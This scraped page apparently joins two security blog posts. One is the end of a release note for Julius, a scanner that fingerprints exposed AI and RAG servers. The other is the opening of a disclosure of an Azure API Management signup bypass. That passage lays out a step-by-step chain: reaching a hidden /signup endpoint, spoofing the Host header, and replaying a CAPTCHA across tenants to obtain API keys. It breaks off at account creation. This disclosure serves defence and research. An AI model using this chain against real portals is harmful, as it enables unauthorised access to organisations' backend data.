support</li> </ul><h3 class="wp-block-heading" id="c0a494f8-d8c6-4bcb-87eb-ce4389178f85">RAG and orchestration platforms (5 probes)</h3><p>Self-hosted RAG platforms are where things get particularly sensitive. These systems are purpose-built to ingest and query internal documents — contracts, HR policies, financial data, source code. An exposed RAG endpoint is, by definition, an exposed document store.</p><ul class="wp-block-list"> <li><strong>PrivateGPT</strong> — Private document Q&amp;A (detected via its <code>/v1/ingest/list</code> endpoint, which returns data even with zero ingested documents and auth disabled by default)</li> <li><strong>RAGFlow</strong> — Open-source RAG engine with deep document understanding</li> <li><strong>Quivr</strong> — Second brain RAG platform</li> <li><strong>h2oGPT</strong> — <a href="http://h2o.ai/" rel="noreferrer noopener">H2O.ai</a>‘s document Q&amp;A platform</li> <li><strong>Langflow</strong> — Visual LLM orchestration framework</li> </ul><h2 class="wp-block-heading" id="ccf95297-a0b7-4298-841e-a7c3e37f9f63">Why self-hosted RAG is the new shadow IT</h2><p>The OpenClaw story from our <a href="https://www.praetorian.com/blog/julius-update-from-17-to-33-probes-and-now-detecting-openclaw/" rel="noreferrer noopener">last update</a> highlighted what happens when AI agent platforms get exposed: leaked API keys, filesystem access, and user impersonation. With this release, we’re seeing the same pattern play out with RAG platforms — except the stakes are different. Instead of agent credentials, you’re looking at the documents themselves.</p><p><strong>PrivateGPT</strong> is a good example. The entire value proposition is <em>“keep your documents private by running everything locally.”</em> The irony is that PrivateGPT’s API defaults to no authentication. Its <code>/v1/ingest/list</code> endpoint is a simple GET that returns every ingested document’s metadata, including filenames and chunk counts. The model field is hardcoded to <code>"private-gpt"</code>, which makes detection trivial and false positives near-zero.</p><p><strong>RAGFlow</strong> follows a similar pattern. Its <code>/v1/system/healthz</code> endpoint is unauthenticated and returns a JSON health check with a <code>doc_engine</code> field that’s unique to RAGFlow — it tracks the status of the Elasticsearch or Infinity backend that powers document retrieval. Even when RAGFlow is partially broken (HTTP 500), the health endpoint still responds with the same structure, making detection reliable in any state.</p><p>The problem isn’t that these tools are insecure by design. It’s that they’re easy to deploy, they serve an obvious need (“let me ask questions about our internal docs”), and teams spin them up without involving security. By the time anyone notices, the system has been indexing sensitive documents on an endpoint with no auth, no network restriction, and no monitoring.</p><p>This is shadow IT for the AI era, and it’s why discovery tooling matters.</p><h2 class="wp-block-heading" id="62d0339a-a8f9-4083-9311-4c150542b427">What else changed</h2><p>Beyond new probes, v0.2.0 includes changes to the scanner itself:</p><p><strong>Breaking API change:</strong> <code>scanner.NewScanner()</code> now requires two additional parameters — <code>maxResponseSize</code> and <code>tlsConfig</code>. If you’re using Julius as a library, see the <a href="https://github.com/praetorian-inc/julius/blob/main/CHANGELOG.md" rel="noreferrer noopener">migration guide</a> in the changelog.</p><p><strong>New CLI flags:</strong></p><ul class="wp-block-list"> <li><code>--max-response-size</code> — Limits response body size (default 10MB) to prevent memory exhaustion from large or malicious responses</li> <li><code>--insecure</code> — Skips TLS certificate verification for testing environments</li> <li><code>--ca-cert</code> — Specifies a custom CA certificate file for enterprise PKI environments</li> </ul><p><strong>Probe quality fixes:</strong></p><ul class="wp-block-list"> <li>Fixed Ollama probe false-positiving on Ollama-compatible servers (SGLang, KoboldCpp) by requiring the <code>"families"</code> field in <code>/api/tags</code> responses</li> <li>Fixed <code>header.contains</code> rules that silently failed on HTTP/2 connections — this affected 5 cloud probes (AWS Bedrock, Cloudflare AI Gateway, Fireworks AI, Modal, OmniRoute)</li> <li>Removed overly generic detection blocks from Bifrost, DeepSpeed-MII, and Groq that caused cross-probe false positives</li> </ul><h2 class="wp-block-heading" id="4b0dd329-72a4-4875-af8c-d9619364d123">What this means for your assessments</h2><p>If you’re running Julius as part of your attack surface discovery workflow, update to v0.2.0:</p><pre id="510d68e8-6a8b-44a6-b4dd-9cfae893a6da" class="wp-block-code"><code><code>$ go install github.com/praetorian-inc/julius/cmd/julius@latest $ julius probe <target></target></code></code></pre><p>For enterprise environments with internal CAs:</p><pre id="4b986ae4-b239-4383-b14b-f92350b7e985" class="wp-block-code"><code><code>$ julius probe --ca-cert /path/to/ca.pem <target></target></code></code></pre><p>All 63 probes are embedded in the binary. No external config, no probe downloads, no API keys.</p><p>The coverage now spans the full AI infrastructure stack: from cloud-managed inference (Bedrock, Azure OpenAI, Vertex AI) through self-hosted serving (SGLang, TensorRT-LLM, Triton) to the RAG and orchestration layer (PrivateGPT, RAGFlow, Langflow). If an organization is running AI infrastructure, Julius should find it.</p><p>We’re continuing to expand probe coverage as new tools emerge. If there’s a service you’re seeing in the wild that Julius doesn’t cover, <a href="https://github.com/praetorian-inc/julius/issues" rel="noreferrer noopener">open an issue</a> or submit a PR. Probes are simple YAML files — you can test locally with <code>julius validate ./probes </code>before submitting.</p><h2 class="wp-block-heading" id="1d4b8084-738e-4bd1-9649-abc7d548738e">FAQ</h2><p><strong>What’s the difference between Julius and model fingerprinting tools?</strong> Model fingerprinting identifies which LLM generated a piece of text. Julius identifies the <em>server infrastructure</em>: what software is running on the endpoint. Think of it as service detection for AI, similar to what Nmap does for traditional services.</p><p><strong>Does Julius send anything malicious?</strong> No. Julius sends standard HTTP requests (GET/POST to known paths) and analyzes the responses. It doesn’t exploit vulnerabilities, submit prompts, or modify anything on the target. It’s passive fingerprinting.</p><p><strong>How do probes get validated before release?</strong> Every probe is tested against live instances of the target service and cross-tested against other LLM services to confirm zero false positives. This release also fixed several cross-probe false positives from v0.1.x.</p><p><strong>Can I add detection for a service Julius doesn’t support yet?</strong> Yes. Probes are defined in simple YAML files. The <a href="https://github.com/praetorian-inc/julius/blob/main/CONTRIBUTING.md" rel="noreferrer noopener">contributing guide</a> walks through the format, and you can test locally with <code>julius validate ./probes</code> before submitting a PR.</p><p><strong>Why is there a breaking API change?</strong> The <code>NewScanner()</code> signature now requires <code>maxResponseSize</code> and <code>tlsConfig</code> parameters. This was necessary to add response size limiting (preventing OOM from malicious servers) and TLS configuration for enterprise environments. If you’re only using the CLI, nothing changes.</p><p>The post <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines</a> appeared first on <a href="https://www.praetorian.com/">Praetorian</a>.</p><div class="spu-placeholder" style="display:none"></div><div class="addtoany_share_save_container addtoany_content addtoany_content_bottom"><div class="a2a_kit a2a_kit_size_20 addtoany_list" data-a2a-url="https://securityboulevard.com/2026/03/julius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines/" data-a2a-title="Julius v0.2.0: From 33 to 63 Probes — Now Detecting Cloud AI, Enterprise Inference, and RAG Pipelines"><a class="a2a_button_twitter" href="https://www.addtoany.com/add_to/twitter?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Twitter" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_linkedin" href="https://www.addtoany.com/add_to/linkedin?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="LinkedIn" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_facebook" href="https://www.addtoany.com/add_to/facebook?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Facebook" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_reddit" href="https://www.addtoany.com/add_to/reddit?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Reddit" rel="nofollow noopener" target="_blank"></a><a class="a2a_button_email" href="https://www.addtoany.com/add_to/email?linkurl=https%3A%2F%2Fsecurityboulevard.com%2F2026%2F03%2Fjulius-v0-2-0-from-33-to-63-probes-now-detecting-cloud-ai-enterprise-inference-and-rag-pipelines%2F&amp;linkname=Julius%20v0.2.0%3A%20From%2033%20to%2063%20Probes%20%E2%80%94%20Now%20Detecting%20Cloud%20AI%2C%20Enterprise%20Inference%2C%20and%20RAG%20Pipelines" title="Email" rel="nofollow noopener" target="_blank"></a><a class="a2a_dd addtoany_share_save addtoany_share" href="https://www.addtoany.com/share"></a></div></div><p class="syndicated-attribution">*** This is a Security Bloggers Network syndicated blog from <a href="https://www.praetorian.com/blog/">Offensive Security Blog: Latest Trends in Hacking | Praetorian</a> authored by <a href="https://securityboulevard.com/author/0/" title="Read other posts by Michelle Rhodes">Michelle Rhodes</a>. Read the original post at: <a href="https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/">https://www.praetorian.com/blog/julius-v020-cloud-ai-rag-detection/</a> </p>

<div data-elementor-type="wp-post" data-elementor-id="10966" class="elementor elementor-10966" data-elementor-post-type="post"> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-93afc5a e-con-full e-flex e-con e-parent" data-id="93afc5a" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-86067b8 elementor-widget elementor-widget-text-editor" data-id="86067b8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The Azure APIM signup bypass is a critical vulnerability affecting 97.9% of internet-facing Developer Portals. Azure API Management (APIM) exposes APIs to external consumers through a Developer Portal, the interface where developers self-register, obtain API keys, and make API calls. The default APIM configuration ships with Basic Authentication enabled as the identity provider and the Starter product set to auto-approve subscriptions. When an administrator disables developer self-signup, they reasonably expect that endpoint to no longer be reachable.</p> <p>It doesn’t. An anonymous attacker can create an account, subscribe to API products, obtain valid API keys, and access backend services, all without authentication or relationship to the target organization. The “disable signup” toggle in Azure APIM’s Developer Portal is purely cosmetic. The backend REST API continues to accept registrations from anyone. This is an <strong>unauthenticated, internet-facing vulnerability</strong> in a service that is internet-facing by design.</p> <p>Praetorian noted that the original issue was detected by security researcher Mihalis Haatainen at <a href="https://www.bountyy.fi/">Bountyy Oy</a> in September 2025 (see <a href="https://github.com/bountyyfi/Azure-APIM-Cross-Tenant-Signup-Bypass/security/advisories/GHSA-vcwf-73jp-r7mv">GHSA-vcwf-73jp-r7mv</a>). Mihalis Haatainen reported the issue to Microsoft’s Security Response Center (MSRC). After two submissions and additional technical details, MSRC issued its final determination: <strong>“By design.”</strong></p> <p>Four months later, we assessed the real-world prevalence.</p> <p>We built a full reproduction environment, demonstrated the complete attack chain from anonymous internet access to sensitive API data exfiltration, and conducted a wide-scale analysis across the internet-facing APIM landscape. We found over 25,000 Azure APIM Developer Portals exposed to the internet. Based on our heuristic analysis, we estimated that 97.9% of them still accept signup requests. Only 51 instances out of 25,379 have actually removed the vulnerable Basic Authentication provider. The attack requires a web browser and a curl command; no credentials, no prior access, and no Azure subscription in the target tenant.</p> <p> </p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8c71d64 e-con-full e-flex e-con e-parent" data-id="8c71d64" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d027db elementor-widget elementor-widget-heading" data-id="4d027db" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Vulnerability</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9040393 e-con-full e-flex e-con e-parent" data-id="9040393" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-568bfd5 elementor-widget elementor-widget-text-editor" data-id="568bfd5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <a id="the-three-part-flaw"></a> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-a4066f6 e-con-full e-flex e-con e-parent" data-id="a4066f6" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae49ae8 elementor-widget elementor-widget-heading" data-id="ae49ae8" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">The Three-Part Flaw</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-e6910fb e-con-full e-flex e-con e-parent" data-id="e6910fb" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-0a00cc7 elementor-widget elementor-widget-text-editor" data-id="0a00cc7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The fundamental issue is a disconnect between what administrators see in the Azure Portal and what actually happens on the backend. Three separate design decisions combine to create the vulnerability:</p> <p><strong>1. The UI toggle is cosmetic:</strong> When an administrator sets portalsettings/signup.properties.enabled to false, the developer portal reads this flag and hides the signup form. The underlying REST API endpoint at /signup remains active and continues to accept registration requests regardless of what the UI displays.</p> <p><strong>2. No tenant validation on the signup endpoint.</strong> Azure APIM Developer Portals are multi-tenant. The APIM infrastructure uses the Host header in incoming requests to route them to the correct instance. When an attacker sends a POST /signup request with Host: victim-portal.developer.azure-api.net, the infrastructure routes it to the victim’s instance. There is no validation that the request originated from that tenant’s portal, that the sender has any relationship to the target organization, or that the request was initiated from the target’s domain.</p> <p><strong>3. The CAPTCHA service is shared across all tenants.</strong> The signup flow includes a CAPTCHA challenge. However, the CAPTCHA validation service is global to Azure APIM. A challenge generated on Instance A is accepted as valid when submitted to Instance B.</p> <p><a id="X7b726d72045493ee04b98d787fee093aed871b0"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-30e11bf e-con-full e-flex e-con e-parent" data-id="30e11bf" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-a5691fb elementor-widget elementor-widget-heading" data-id="a5691fb" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h2 class="elementor-heading-title elementor-size-default">The Kill Chain: From Anonymous Access to API Keys</h2> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-8130df1 e-con-full e-flex e-con e-parent" data-id="8130df1" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-15a59e6 elementor-widget elementor-widget-text-editor" data-id="15a59e6" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Account creation is the entry point. The actual severity depends on what APIs are exposed through the Developer Portal and whether the attacker can obtain subscription keys to call them. We reproduced the full attack chain on controlled infrastructure to map each step.</p> <p><a id="why-account-creation-alone-is-not-enough"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-aab12e7 e-con-full e-flex e-con e-parent" data-id="aab12e7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9bf00e2 elementor-widget elementor-widget-heading" data-id="9bf00e2" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Why Account Creation Alone Is Not Enough</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-4ebf48b e-con-full e-flex e-con e-parent" data-id="4ebf48b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-6f62cfc elementor-widget elementor-widget-text-editor" data-id="6f62cfc" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>An APIM Developer Portal account gives the attacker a session. What they can do with that session depends on the <strong>product configuration</strong>, a second layer of APIM settings that determines post-authentication access.</p> <p>APIs in APIM are not exposed directly. They are grouped into <strong>Products</strong>, and users must subscribe to a product to obtain a subscription key. Two product-level settings, subscriptionRequired and approvalRequired, determine whether an attacker can self-serve to obtain API access. The critical combination is subscriptionRequired: true with approvalRequired: false (subscription needed, but auto-approved). This is the <strong>default configuration</strong> for the built-in Starter product that ships with every new APIM instance. An attacker who creates an account can immediately subscribe and receive a valid API key without administrator involvement.</p> <p><a id="attack-path-overview"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-6868fdd e-con-full e-flex e-con e-parent" data-id="6868fdd" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-63f1ca5 elementor-widget elementor-widget-heading" data-id="63f1ca5" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Attack Path Overview</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-7dcc48d e-con-full e-flex e-con e-parent" data-id="7dcc48d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-d2a4dec elementor-widget elementor-widget-text-editor" data-id="d2a4dec" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-00bfab0 e-con-full e-flex e-con e-parent" data-id="00bfab0" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-3298fe1 elementor-widget elementor-widget-image" data-id="3298fe1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img fetchpriority="high" decoding="async" width="544" height="1308" src="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp" class="attachment-full size-full wp-image-10950" alt="Flowchart showing attack steps from anonymous attacker discovering target via Shodan to creating developer account and exfiltrating data" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1.webp 544w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-125x300.webp 125w, https://www.praetorian.com/wp-content/uploads/2026/03/flowchart-showing-attack-steps-from-anonymous-attacker-disco-1-426x1024.webp 426w" sizes="(max-width: 544px) 100vw, 544px"><figcaption class="widget-image-caption wp-caption-text">Attack path from anonymous attacker to data exfiltration</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9af606b e-con-full e-flex e-con e-parent" data-id="9af606b" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4d2d10a elementor-widget elementor-widget-heading" data-id="4d2d10a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h3 class="elementor-heading-title elementor-size-default">Simulated Attack Chain</h3> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-589ceef e-con-full e-flex e-con e-parent" data-id="589ceef" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-741602a elementor-widget elementor-widget-text-editor" data-id="741602a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>We demonstrated this against a controlled APIM instance under our ownership, configured with a mock healthcare IoT API behind the default Starter product. The CAPTCHA was generated cross-tenant from a separate APIM instance we control to demonstrate the cross-tenant replay.</p> <p><a id="step-1-identify-the-target."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-ae38fb7 e-con-full e-flex e-con e-parent" data-id="ae38fb7" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9ae8846 elementor-widget elementor-widget-heading" data-id="9ae8846" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 1: Identify the target.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-79225a3 e-con-full e-flex e-con e-parent" data-id="79225a3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-65104af elementor-widget elementor-widget-text-editor" data-id="65104af" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker discovers the target’s Developer Portal hostname. These are publicly indexed; our Shodan enumeration found 25,379 unique instances.</p> <p>Target: apim-research-target-t3.developer.azure-api.net</p> <p><a id="X6b2794b1dd9fa9a2772ac2a5ffcb82f2e4e1b0f"></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-cacc5de e-con-full e-flex e-con e-parent" data-id="cacc5de" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ee4847b elementor-widget elementor-widget-heading" data-id="ee4847b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 2: Verify the target appears locked down, then bypass it.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-26e0b9e e-con-full e-flex e-con e-parent" data-id="26e0b9e" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-1c4f22c elementor-widget elementor-widget-text-editor" data-id="1c4f22c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The target organization’s portal shows no signup option, and the administrator has “disabled” signup. The only visible option is “Sign in”:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-25c2f34 e-con-full e-flex e-con e-parent" data-id="25c2f34" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-88b03ef elementor-widget elementor-widget-image" data-id="88b03ef" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="1720" height="1328" src="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp" class="attachment-full size-full wp-image-10951" alt="API portal webpage with header navigation showing Home, APIs, Products links and Sign In button, main content area displays 'page content' text" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1.webp 1720w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-300x232.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1024x791.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-768x593.webp 768w, https://www.praetorian.com/wp-content/uploads/2026/03/api-portal-webpage-with-header-navigation-showing-home-apis-1-1-1536x1186.webp 1536w" sizes="(max-width: 1720px) 100vw, 1720px"><figcaption class="widget-image-caption wp-caption-text">The target’s Developer Portal. The administrator has disabled signup. No “Sign up” button is visible anywhere on the page.</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-2c45dd5 e-con-full e-flex e-con e-parent" data-id="2c45dd5" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9500280 elementor-widget elementor-widget-text-editor" data-id="9500280" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>Azure APIM Developer Portal with signup disabled showing only a Sign In option and no Sign Up button visible</p> <p><em>The target’s Developer Portal. The administrator has disabled signup. No “Sign up” button is visible anywhere on the page.</em></p> <p>However, a single request confirms whether the signup endpoint is still active behind the scenes:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-0f2b990 e-con-full e-flex e-con e-parent" data-id="0f2b990" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b2756da elementor-widget elementor-widget-image" data-id="b2756da" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img decoding="async" width="960" height="424" src="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp" class="attachment-full size-full wp-image-10952" alt="Terminal showing curl POST request to signup API returning HTTP 400 error with ValidationError for challenge and signupData fields" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1.webp 960w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-300x133.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/terminal-showing-curl-post-request-to-signup-api-returning-h-1-768x339.webp 768w" sizes="(max-width: 960px) 100vw, 960px"><figcaption class="widget-image-caption wp-caption-text">POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-deaa032 e-con-full e-flex e-con e-parent" data-id="deaa032" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-4ea5391 elementor-widget elementor-widget-text-editor" data-id="4ea5391" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>POST signup probe with empty JSON body returning HTTP 400 ValidationError confirming the signup endpoint is still active</p> <p><em>POST /signup probe with empty JSON body returns ValidationError confirming active endpoint</em></p> <p>The HTTP 400 ValidationError with challenge and signupData fields confirms the /signup endpoint is live and Basic Auth is enabled. The toggle only hid the button.</p> <p><a id="step-3-create-a-cross-tenant-account."></a> </p></div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-1ca1c56 e-con-full e-flex e-con e-parent" data-id="1ca1c56" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-9a6e194 elementor-widget elementor-widget-heading" data-id="9a6e194" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default"> <h4 class="elementor-heading-title elementor-size-default">Step 3: Create a cross-tenant account.</h4> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-bc35f9d e-con-full e-flex e-con e-parent" data-id="bc35f9d" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-fa4a867 elementor-widget elementor-widget-text-editor" data-id="fa4a867" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default"> <p>The attacker generates and solves a CAPTCHA on their own APIM instance, then replays the solution against the target:</p> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b9bd2d3 e-con-full e-flex e-con e-parent" data-id="b9bd2d3" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-b3248f1 elementor-widget elementor-widget-image" data-id="b3248f1" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="500" height="436" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp" class="attachment-full size-full wp-image-10953" alt="HTTP POST request to signup endpoint with JSON payload containing CAPTCHA challenge data and user registration details" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1.webp 500w, https://www.praetorian.com/wp-content/uploads/2026/03/http-post-request-to-signup-endpoint-with-json-payload-conta-1-300x262.webp 300w" sizes="auto, (max-width: 500px) 100vw, 500px"><figcaption class="widget-image-caption wp-caption-text">Cross-tenant signup POST request with attacker credentials and replayed CAPTCHA</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-b54db11 e-con-full e-flex e-con e-parent" data-id="b54db11" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-ae3b262 elementor-widget elementor-widget-image" data-id="ae3b262" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="420" height="176" src="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp" class="attachment-full size-full wp-image-10954" alt="HTTP response showing status 200 OK, Content-Type application/json header, and response body containing the string OK" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1.webp 420w, https://www.praetorian.com/wp-content/uploads/2026/03/http-response-showing-status-200-ok-content-type-application-1-300x126.webp 300w" sizes="auto, (max-width: 420px) 100vw, 420px"><figcaption class="widget-image-caption wp-caption-text">HTTP 200 OK response confirming account creation</figcaption></figure> </div> </div> <div data-particle_enable="false" data-particle-mobile-disabled="false" class="elementor-element elementor-element-9184338 e-con-full e-flex e-con e-parent" data-id="9184338" data-element_type="container" data-e-type="container"> <div class="elementor-element elementor-element-c079ed7 elementor-widget elementor-widget-image" data-id="c079ed7" data-element_type="widget" data-e-type="widget" data-widget_type="image.default"> <figure class="wp-caption"> <img loading="lazy" decoding="async" width="1316" height="488" src="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp" class="attachment-full size-full wp-image-10955" alt="Email from [email protected] asking user to confirm new API account by clicking a suspicious link with long parameters" srcset="https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1.webp 1316w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-300x111.webp 300w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-1024x380.webp 1024w, https://www.praetorian.com/wp-content/uploads/2026/03/email-from-researchpraetoriancom-asking-user-to-confirm-new-1-1-768x285.webp 768w" sizes="auto, (max-width: 1316px) 100vw, 1316px"><figcaption class="widget-image-caption wp-caption-text">Email invitation after successful self-sign-up</figcaption></figure> 